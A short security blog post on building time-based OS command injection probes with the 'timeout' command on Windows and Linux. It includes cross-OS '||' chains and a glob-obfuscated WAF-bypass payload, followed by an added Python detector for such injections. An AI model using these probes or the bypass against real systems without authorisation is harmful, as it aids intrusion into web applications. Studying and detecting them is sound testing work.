Diversify Attack Vectors via Time Management

I’ve just learned about the “Timeout” function while working with cmd.exe and wanted to share this quick post with you.

When I looked at the Timeout help page via the "Timeout /?" command on Windows, I saw that the Timeout function can delay any system function for X seconds with the /T X option. On Linux, it does something like "Timeout Xs".

So the Timeout function lets us delay the system. Then I got an idea: maybe I could create an alternative to attack vectors such as Ping or Sleep this way. It seems we can do this in several different ways. Some of the commands produce syntax errors when run, but I assume some of them will work. Now let's use this information to develop attack vectors.

Windows examples as below:

Timeout /T 1

Waits for 1 sec.

Timeout 1

Waits for 1 sec.

Linux examples as below:

timeout 1

I got the error “Try 'timeout --help' for more information.”

timeout 1s sleep 5

Waits for 1 sec. The “Sleep” command is not working.

timeout 1 sleep 5

Waits for 1 sec. The “Sleep” command is not working.

timeout 3 ping -n 127.0.0.1

The ping command worked 3 times.

timeout 0 ping -n 3 127.0.0.1

I got the error “connect : Invalid argument”.

We have created some payloads for Linux and Windows above. Now let's try to create an attack vector that works on both operating systems. To do this, we split the command in two with the "||" double-pipe operator, which runs the right-hand command only if the left-hand one fails.

Windows examples as below:

timeout 5 || timeout 1 sleep 5

The command on the left of the double pipe worked.

timeout /T 5 || timeout 1 sleep 5

The command on the left of the double pipe worked.

Linux examples as below:

timeout 5 || timeout 1 sleep 5

The command on the left didn’t work; I got the error “Try 'timeout --help' for more information.”, but the right side waited for 1 second.

timeout 5 || timeout 0 sleep 5

The command on the left didn’t work; I got the error “Try 'timeout --help' for more information.”, but the right side waited for 5 seconds using the sleep command.

As we have seen in this section, we developed a few examples that work on both operating systems, and I then opened an issue in the Commix repository for these attack vectors ( https://github.com/commixproject/commix/issues/156 ). Maybe the Timeout function can be used for WAF bypass in the OOB (Out Of Band) payload, i.e. the time-based detection used in the vulnerability detection phase.

For example:

We could create other variants of the code below to bypass a WAF while testing for OS command injection. The “?” symbol also triggers bash's filename-globbing (wildcard) mechanism, so the shell expands the pattern to a matching binary.

timeout 3 /b??/p??g -n 127.0.0.1
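From the defender's side, the same tricks (the "||" fallback, timeout wrapping a child command, and "?" globs hiding a binary name) can be matched in request parameters. The following is an added detection example, not code from the original post or from Commix; the KNOWN_BINARIES paths and the sample queries are assumptions constructed for the demo.

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote_plus

# Commands an injected payload uses to create a measurable delay
DELAY_COMMANDS = {"timeout", "sleep", "ping"}
# Assumed locations a glob such as /b??/p??g could expand to
KNOWN_BINARIES = ["/bin/sleep", "/usr/bin/sleep", "/bin/ping", "/usr/bin/ping",
                  "/bin/timeout", "/usr/bin/timeout"]
# Shell command separators, including the || fallback and $( ) substitution
_SEPARATOR_RE = re.compile(r"[;|&`\n]+|\$\(")


def resolve_command(word):
    """Return the delay command a shell word names, or None.
    Words containing ? or * (e.g. /b??/p??g or p??g) are expanded the way
    the shell would, by matching them against KNOWN_BINARIES."""
    word = word.rstrip(")")
    if "?" in word or "*" in word:
        for path in KNOWN_BINARIES:
            target = path if "/" in word else path.rsplit("/", 1)[-1]
            if fnmatchcase(target, word):
                return path.rsplit("/", 1)[-1]
        return None
    name = word.rsplit("/", 1)[-1]
    return name if name in DELAY_COMMANDS else None


def find_delay_commands(query_string):
    """URL-decode a raw query string and list every delay command it would run.
    Every word of a segment is checked, not only the first, because
    `timeout N CMD` runs CMD as a child (so `timeout 3 /b??/p??g` is ping)."""
    decoded = unquote_plus(query_string)
    found = []
    for segment in _SEPARATOR_RE.split(decoded):
        for word in segment.split():
            name = resolve_command(word)
            if name is not None:
                found.append(name)
    return found


# Constructed sample requests (not from the original post); the last one is benign
SAMPLE_QUERIES = [
    "ip=127.0.0.1%3Btimeout+5",                                 # ; timeout 5
    "ip=127.0.0.1%7C%7Ctimeout+1+sleep+5",                      # || timeout 1 sleep 5
    "ip=127.0.0.1%3B+timeout+3+/b%3F%3F/p%3F%3Fg+-n+127.0.0.1",  # glob-hidden ping
    "ip=127.0.0.1&timeout=5",                                   # parameter merely named timeout
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q, "->", find_delay_commands(q) or "clean")
```

Because "&" is both a query-string separator and a shell operator, the scan runs over the raw decoded query rather than over parsed parameter values, so an encoded "&&" injection is not split away by the parser.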

Have Fun!

Special thanks to Zinnur Yeşilyurt